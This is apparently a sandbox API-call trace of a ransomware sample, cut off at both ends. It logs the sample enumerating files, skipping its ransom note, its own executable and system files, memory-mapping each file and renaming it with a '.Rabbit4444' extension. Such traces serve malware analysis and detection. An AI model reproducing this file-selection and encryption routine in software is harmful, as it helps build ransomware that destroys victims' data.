Size=0x208) returned 0x11db48 [0067.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.440] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15875123089) returned 1 [0067.441] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0067.441] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0067.441] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.441] CloseHandle (hObject=0x29c) returned 1 [0067.441] CloseHandle (hObject=0x280) returned 1 [0067.441] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg.Rabbit4444") returned 174 [0067.441] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg.rabbit4444"), dwFlags=0x1) returned 1 [0067.442] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a54f700, ftCreationTime.dwHighDateTime=0x1d19562, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x2a54f700, ftLastWriteTime.dwHighDateTime=0x1d19562, nFileSizeHigh=0x0, nFileSizeLow=0xa2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.schema", cAlternateFileName="SETTIN~1.SCH")) returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="Rabbit4444.exe") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2=".") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="..") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="windows") returned -1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="bootmgr") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="pagefile.sys") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="boot") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="ids.txt") returned 1 [0067.442] lstrcmpiW (lpString1="settings.schema", lpString2="NTUSER.DAT") returned 1 [0067.442] lstrcpyW (in: lpString1=0x130ec66, lpString2="settings.schema" | out: lpString1="settings.schema") returned="settings.schema" [0067.442] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema", dwFileAttributes=0x0) returned 1 [0067.442] lstrlenW (lpString="settings.schema") returned 15 [0067.442] lstrlenW (lpString="Rabbit4444") returned 10 [0067.442] lstrcmpiW (lpString1="ngs.schema", lpString2="Rabbit4444") returned -1 [0067.442] lstrlenW (lpString=".dll") returned 4 [0067.442] lstrcmpiW (lpString1="hema", lpString2=".dll") returned 1 [0067.442] lstrlenW (lpString=".lnk") returned 4 [0067.442] lstrcmpiW (lpString1="hema", lpString2=".lnk") returned 1 [0067.442] lstrlenW (lpString=".ini") returned 4 [0067.442] lstrcmpiW (lpString1="hema", lpString2=".ini") returned 1 [0067.442] lstrlenW (lpString=".sys") returned 4 [0067.442] lstrcmpiW (lpString1="hema", lpString2=".sys") returned 1 [0067.442] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.443] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.443] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15875355655) returned 1 [0067.443] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=162) returned 1 [0067.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0067.443] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0067.443] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x29c [0067.444] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x70000 [0067.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.445] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.446] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.446] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.446] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15875635841) returned 1 [0067.446] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0067.446] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0067.446] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.446] CloseHandle (hObject=0x29c) returned 1 [0067.446] CloseHandle (hObject=0x280) returned 1 [0067.446] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema.Rabbit4444") returned 177 [0067.446] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.schema.rabbit4444"), dwFlags=0x1) returned 1 [0067.447] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a54f700, ftCreationTime.dwHighDateTime=0x1d19562, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x2a54f700, ftLastWriteTime.dwHighDateTime=0x1d19562, nFileSizeHigh=0x0, nFileSizeLow=0x7b5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settingsconversions.txt", cAlternateFileName="SETTIN~2.TXT")) returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="Rabbit4444.exe") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2=".") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="..") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="windows") returned -1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="bootmgr") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="pagefile.sys") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="boot") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="ids.txt") returned 1 [0067.447] lstrcmpiW (lpString1="settingsconversions.txt", lpString2="NTUSER.DAT") returned 1 [0067.447] lstrcpyW (in: lpString1=0x130ec66, lpString2="settingsconversions.txt" | out: lpString1="settingsconversions.txt") returned="settingsconversions.txt" [0067.447] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt", dwFileAttributes=0x0) returned 1 [0067.448] lstrlenW (lpString="settingsconversions.txt") returned 23 [0067.448] lstrlenW (lpString="Rabbit4444") returned 10 [0067.448] lstrcmpiW (lpString1="rsions.txt", lpString2="Rabbit4444") returned 1 [0067.448] lstrlenW (lpString=".dll") returned 4 [0067.448] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.448] lstrlenW (lpString=".lnk") returned 4 [0067.448] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.448] lstrlenW (lpString=".ini") returned 4 [0067.448] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.448] lstrlenW (lpString=".sys") returned 4 [0067.448] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.448] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.449] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.449] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15875950336) returned 1 [0067.449] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=31582) returned 1 [0067.449] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0067.449] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0067.449] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e60, lpName=0x0) returned 0x29c [0067.450] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e60) returned 0x70000 [0067.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.453] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15876333107) returned 1 [0067.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0067.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0067.453] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.453] CloseHandle (hObject=0x29c) returned 1 [0067.453] CloseHandle (hObject=0x280) returned 1 [0067.453] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt.Rabbit4444") returned 185 [0067.453] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsconversions.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.454] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13431000, ftCreationTime.dwHighDateTime=0x1d196ee, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x13431000, ftLastWriteTime.dwHighDateTime=0x1d196ee, nFileSizeHigh=0x0, nFileSizeLow=0x9e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settingsglobals.txt", cAlternateFileName="SETTIN~1.TXT")) returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="Rabbit4444.exe") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2=".") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="..") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="windows") returned -1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="bootmgr") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="pagefile.sys") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="boot") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="ids.txt") returned 1 [0067.454] lstrcmpiW (lpString1="settingsglobals.txt", lpString2="NTUSER.DAT") returned 1 [0067.454] lstrcpyW (in: lpString1=0x130ec66, lpString2="settingsglobals.txt" | out: lpString1="settingsglobals.txt") returned="settingsglobals.txt" [0067.454] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt", dwFileAttributes=0x0) returned 1 [0067.454] lstrlenW (lpString="settingsglobals.txt") returned 19 [0067.455] lstrlenW (lpString="Rabbit4444") returned 10 [0067.455] lstrcmpiW (lpString1="lobals.txt", lpString2="Rabbit4444") returned -1 [0067.455] lstrlenW (lpString=".dll") returned 4 [0067.455] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.455] lstrlenW (lpString=".lnk") returned 4 [0067.455] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.455] lstrlenW (lpString=".ini") returned 4 [0067.455] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.455] lstrlenW (lpString=".sys") returned 4 [0067.455] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.455] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.455] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.455] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15876596845) returned 1 [0067.455] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=40479) returned 1 [0067.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0067.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0067.455] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa120, lpName=0x0) returned 0x29c [0067.456] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa120) returned 0x70000 [0067.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.459] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15877022342) returned 1 [0067.460] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0067.460] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0067.460] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.460] CloseHandle (hObject=0x29c) returned 1 [0067.460] CloseHandle (hObject=0x280) returned 1 [0067.460] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt.Rabbit4444") returned 181 [0067.460] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingsglobals.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.461] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3241a200, ftCreationTime.dwHighDateTime=0x1d196ee, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3241a200, ftLastWriteTime.dwHighDateTime=0x1d196ee, nFileSizeHigh=0x0, nFileSizeLow=0x12b16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settingssynonyms.txt", cAlternateFileName="SETTIN~3.TXT")) returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="Rabbit4444.exe") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2=".") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="..") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="windows") returned -1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="bootmgr") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="pagefile.sys") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="boot") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="ids.txt") returned 1 [0067.461] lstrcmpiW (lpString1="settingssynonyms.txt", lpString2="NTUSER.DAT") returned 1 [0067.461] lstrcpyW (in: lpString1=0x130ec66, lpString2="settingssynonyms.txt" | out: lpString1="settingssynonyms.txt") returned="settingssynonyms.txt" [0067.461] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt", dwFileAttributes=0x0) returned 1 [0067.462] lstrlenW (lpString="settingssynonyms.txt") returned 20 [0067.462] lstrlenW (lpString="Rabbit4444") returned 10 [0067.462] lstrcmpiW (lpString1="nonyms.txt", lpString2="Rabbit4444") returned -1 [0067.462] lstrlenW (lpString=".dll") returned 4 [0067.462] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.462] lstrlenW (lpString=".lnk") returned 4 [0067.462] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.462] lstrlenW (lpString=".ini") returned 4 [0067.462] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.462] lstrlenW (lpString=".sys") returned 4 [0067.462] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.462] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settingssynonyms.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.462] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.462] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15877301529) returned 1 [0067.462] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=76566) returned 1 [0067.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0067.462] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12e20, lpName=0x0) returned 0x29c [0067.464] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12e20) returned 0x70000 [0067.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.467] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0067.467] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0067.468] HeapFree (in: 